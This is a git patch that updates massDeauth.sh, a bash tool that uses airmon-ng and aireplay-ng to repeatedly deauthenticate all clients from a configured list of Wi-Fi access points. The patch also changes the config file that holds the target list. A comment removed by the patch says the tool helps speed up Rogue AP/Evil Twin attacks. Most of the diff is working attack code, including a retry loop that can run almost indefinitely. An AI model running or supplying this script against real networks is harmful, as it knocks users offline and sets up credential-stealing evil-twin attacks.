From 3751a3eadfffe80d34c531c8d24284624ab8c7ca Mon Sep 17 00:00:00 2001 From: Mariusz B Date: Tue, 13 Feb 2018 16:06:37 +0100 Subject: [PATCH] Updated massDeauth.sh script. --- networks/wpa2-enterprise-utils/config.txt | 6 +- networks/wpa2-enterprise-utils/massDeauth.sh | 68 +++++++++++--------- 2 files changed, 41 insertions(+), 33 deletions(-) diff --git a/networks/wpa2-enterprise-utils/config.txt b/networks/wpa2-enterprise-utils/config.txt index c4306c3..419deff 100644 --- a/networks/wpa2-enterprise-utils/config.txt +++ b/networks/wpa2-enterprise-utils/config.txt @@ -9,6 +9,6 @@ retry = 3 # Here comes a list of APs to attack. The list entry form is following: # target = -target = test 00:11:22:33:44:55 14 -target = test2 00:11:22:33:44:55 14 -target = test3 00:11:22:33:44:55 14 +target = SomeAP 00:11:22:33:44:55 1 +target = OtherAP 00:11:22:33:44:55 2 +target = AnotherAP 00:11:22:33:44:55 3 diff --git a/networks/wpa2-enterprise-utils/massDeauth.sh b/networks/wpa2-enterprise-utils/massDeauth.sh index 306f1de..dd11501 100755 --- a/networks/wpa2-enterprise-utils/massDeauth.sh +++ b/networks/wpa2-enterprise-utils/massDeauth.sh @@ -1,32 +1,9 @@ #!/bin/bash # -# Simple script intended to perform mass-deauthentication of -# any associated&authenticated client to the Access-Point. -# Helpful to actively speed up Rogue AP/Evil Twin attacks in -# multiple Access-Points within an ESSID environments. -# -# In other words, if you have an ESSID set up from many -# access-points (BSSIDs) - this script will help you -# deauthenitcate all clients from those APs iteratively. -# -# Expected config file must obey the following format: -# ----------------------------------------------- -# # Specify an interface -# iface = wlp4s0 -# -# # Number of deauths -# deauths = 3 -# -# # Retry deauths, 0 - infinity -# retry = 3 -# -# # Here comes a list of APs to attack. The list entry form is following: -# # target = -# target = test 00:11:22:33:44:55 14 -# target = test2 00:11:22:33:44:55 14 -# target = test3 00:11:22:33:44:55 14 -# ----------------------------------------------- +# This is a massive WLAN deauthentication attacking script +# that takes as input list of APs against which should deauth be launched, +# and then attempts that attack. # # Mariusz B. / mgeeky '18, # @@ -36,6 +13,11 @@ if [ $# -ne 1 ]; then exit 1 fi +if [ $EUID -ne 0 ]; then + echo "[!] This script must be launched as root." + exit 1 +fi + function deauthClients { echo -e "\tDeauthing clients in AP: $essid / $bssid, $ch" iface=$1 @@ -44,33 +26,59 @@ function deauthClients { ch=$4 deauths=$5 - airmon-ng stop $iface @> /dev/null + airmon-ng stop ${iface}mon @> /dev/null + sleep 2 echo -e "\t[1] Starting monitor on channel $ch" airmon-ng start $iface $ch @> /dev/null + sleep 3 + if [ -z "$(ls /sys/class/net | paste | grep ${iface}mon)" ]; then + echo "[!] Could not start monitor interface! Will try again..." + sleep 3 + return + fi + echo -e "\t[2] Deauthing $deauths number of times..." - aireplay-ng --deauth $deauths -a $essid $iface + aireplay-ng --deauth $deauths -e $essid -a $bssid ${iface}mon } config=$(cat $1 | grep -vE '^#') retry=$(echo "$config" | grep retry | cut -d= -f2 | cut -d' ' -f2-) -deauths=$(echo "$config" | grep deauths | cut -d= -f2 | cut -d' ' -f2-) +deauths=$(echo "$config" | grep 'deauths' | grep '=' | awk '{print $3}') iface=$(echo "$config" | grep iface | cut -d= -f2 | cut -d' ' -f2-) echo "Using interface: $iface" +echo "Retry count: $retry" +echo "Deauths to be sent: $deauths" + +if [ -n "$(ps -eF | grep -v grep | grep airodump)" ]; then + echo "[!] Airodump-ng is running: will not stick to one channel." + echo "[!] Please kill airodump-ng first, then proceed further." + exit 1 +fi -IFS=$'\n' if [ $retry -eq 0 ]; then retry=99999999 fi +IFS=$'\n' for i in $(seq 0 $retry); do echo -e "\n[$i] Deauthing clients..." for line in $(echo "$config" | grep 'target' | cut -d= -f2 | cut -d' ' -f2-); do essid=$(echo "$line" | awk '{print $1}') bssid=$(echo "$line" | awk '{print $2}') ch=$(echo "$line" | awk '{print $3}') + + if [ -z $ch ]; then + echo "[!] You must specify for ESSID: $essid" + exit 1 + fi + + if [ -z $bssid ]; then + echo "[!] You must specify for ESSID: $essid" + exit 1 + fi deauthClients $iface $essid $bssid $ch $deauths done